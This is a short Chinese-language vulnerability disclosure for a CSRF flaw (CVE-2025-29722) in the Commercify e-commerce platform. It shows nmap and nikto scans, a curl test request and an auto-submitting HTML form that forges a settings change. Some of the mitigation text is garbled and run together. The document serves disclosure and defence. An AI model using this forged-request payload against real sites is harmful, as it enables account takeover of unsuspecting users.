发现者:David P.S Abraham(又名 Davycipher)
CVE-2025-29722 已由 MITRE Corporation 分配给此漏洞。
在 Commercify v1.0 中发现了一个 CSRF 漏洞,这是一个由 @yassmittal 开发的开源电子商务平台。该应用在 /update_settings 等关键端点上缺少适当的 CSRF 防护机制,攻击者可在其他域名下构造恶意请求来修改用户数据。
nmap 扫描显示该服务可通过端口 5173 访问,表明这可能是一个开发服务器。
nmap -p 5173 localhost
接下来,我使用 nikto 扫描了该应用,发现:
X-Frame-Options 响应头Access-Control-Allow-Origin: *)在探索应用的过程中,根据用户仪表盘的功能,我怀疑可能存在 update_settings 端点。我使用以下命令对其进行了测试:
curl -X POST "http://localhost:5173/update_settings" \
-d "username=attacker&[email protected]"
虽然返回了 404 Not Found,但此行为可能因环境而异。在有效的部署环境中,这可能导致账户被完全操控。
基于 HTML 的攻击,用于利用该 CSRF 缺陷:
<form action="http://localhost:5173/update_settings" method="POST">
<input type="hidden" name="username" value="attacker">
<input type="hidden" name="email" value="[email protected]">
</form>
<script>
document.forms[0].submit();
</script>
SameSite Cookie 属性*)SameSite=Strict 或 LaxDavid P.S. Abraham
别名:Davycipher